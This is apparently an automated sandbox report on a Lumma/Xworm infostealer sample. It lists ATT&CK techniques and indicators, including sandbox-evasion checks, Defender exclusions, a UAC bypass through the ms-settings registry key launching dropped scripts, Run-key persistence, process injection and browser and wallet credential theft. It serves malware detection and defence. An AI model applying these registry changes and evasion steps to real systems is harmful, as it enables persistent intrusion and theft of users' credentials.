lumma | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rh.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
11	4892	powershell.exe
12	4892	powershell.exe
260	3468	powershell.exe
261	5044	powershell.exe
263	1696	mshta.exe
266	2004	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1496	powershell.exe
3144	powershell.exe
1028	powershell.exe
404	powershell.exe
3468	powershell.exe
5044	powershell.exe
2004	powershell.exe
4892	powershell.exe
4368	powershell.exe
1232	powershell.exe
1872	powershell.exe
2688	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Mig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Mig.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	cmd.exe

Executes dropped EXE 58 IoCs

pid	Process
3600	tik-tok-1.0.5.0-installer_iPXA-F1.exe
2332	main_v4.exe
3096	TikTok18.exe
2976	TikTok18.exe
3336	papa_hr_build.exe
4536	papa_hr_build.exe
4948	fHR9z2C.exe
4352	papa_hr_build.exe
1100	papa_hr_build.exe
3840	filer.exe
4588	AmLzNi.exe
2088	Xworm%20V5.6.exe
4000	XClient.exe
2152	333.exe
480	VBVEd6f.exe
1088	test12.exe
2680	test6.exe
2344	test14.exe
2976	pantest.exe
1564	test9.exe
960	test10-29.exe
2708	test19.exe
4396	test10.exe
3868	test_again4.exe
4208	test23.exe
4060	test5.exe
1844	test11.exe
1948	test20.exe
3248	test_again3.exe
5060	test16.exe
1812	test13.exe
4352	test_again2.exe
968	test15.exe
452	test18.exe
2912	test21.exe
896	test22.exe
3260	test8.exe
2836	test7.exe
3360	test-again.exe
4392	test17.exe
4800	vg9qcBa.exe
3764	vg9qcBa.exe
4768	win.exe
2276	x4lburt.exe
1828	computerlead.exe
3764	9758xBqgE1azKnB.exe
1840	7mpPLxE.exe
2264	7mpPLxE.exe
2636	0fVlNye.exe
1560	Reynolds.com
2012	Reynolds.com
2652	IMG001.exe
2656	rh.exe
4912	file.exe
4012	tftp.exe
1684	IMG001.exe
2956	LB31.exe
2916	Mig.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine	rh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe"	win.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	x4lburt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	bitbucket.org
3	bitbucket.org
11	bitbucket.org

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2780	arp.exe

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4376	powercfg.exe
2172	powercfg.exe
2580	powercfg.exe
2624	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral5/files/0x000400000002571a-305.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	LB31.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3116	tasklist.exe
4372	tasklist.exe
1884	tasklist.exe
1388	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2656	rh.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3336 set thread context of 4536	3336	papa_hr_build.exe	104
PID 4352 set thread context of 1100	4352	papa_hr_build.exe	131
PID 4800 set thread context of 3764	4800	vg9qcBa.exe	220
PID 1828 set thread context of 4192	1828	computerlead.exe	231
PID 1840 set thread context of 2264	1840	7mpPLxE.exe	238
PID 1560 set thread context of 2012	1560	Reynolds.com	253
PID 2012 set thread context of 1464	2012	Reynolds.com	254
PID 2956 set thread context of 4756	2956	LB31.exe	303

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\IdeasApp	0fVlNye.exe
File opened for modification	C:\Windows\JoiningMazda	0fVlNye.exe
File opened for modification	C:\Windows\UruguayNorthern	0fVlNye.exe
File opened for modification	C:\Windows\VatBukkake	0fVlNye.exe
File opened for modification	C:\Windows\DownReceptor	0fVlNye.exe
File opened for modification	C:\Windows\ComfortSick	0fVlNye.exe
File opened for modification	C:\Windows\CentralAvoiding	0fVlNye.exe
File opened for modification	C:\Windows\MozambiqueAppropriate	0fVlNye.exe
File opened for modification	C:\Windows\TeddySecretariat	0fVlNye.exe
File opened for modification	C:\Windows\OrganDiscretion	0fVlNye.exe
File opened for modification	C:\Windows\KeyboardsTwin	0fVlNye.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4540	sc.exe
4888	sc.exe
3948	sc.exe
5096	sc.exe
3584	sc.exe
1384	sc.exe
4988	sc.exe
2496	sc.exe
3256	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1896	3336	WerFault.exe	103
4868	4352	WerFault.exe	130
8	4192	WerFault.exe	231
2400	2656	WerFault.exe	260

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	papa_hr_build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vg9qcBa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vg9qcBa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTok18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tftp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	route.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBVEd6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0fVlNye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	333.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	papa_hr_build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	papa_hr_build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9758xBqgE1azKnB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	papa_hr_build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tik-tok-1.0.5.0-installer_iPXA-F1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	arp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	computerlead.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTok18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	main_v4.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral5/files/0x0002000000025cdc-649.dat	nsis_installer_2
behavioral5/files/0x0005000000025ce7-1748.dat	nsis_installer_1
behavioral5/files/0x0005000000025ce7-1748.dat	nsis_installer_2

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5116	wmic.exe
3428	wmic.exe
4844	wmic.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2408	taskkill.exe
2732	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 34 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4911.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2998.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2510.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	main_v4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b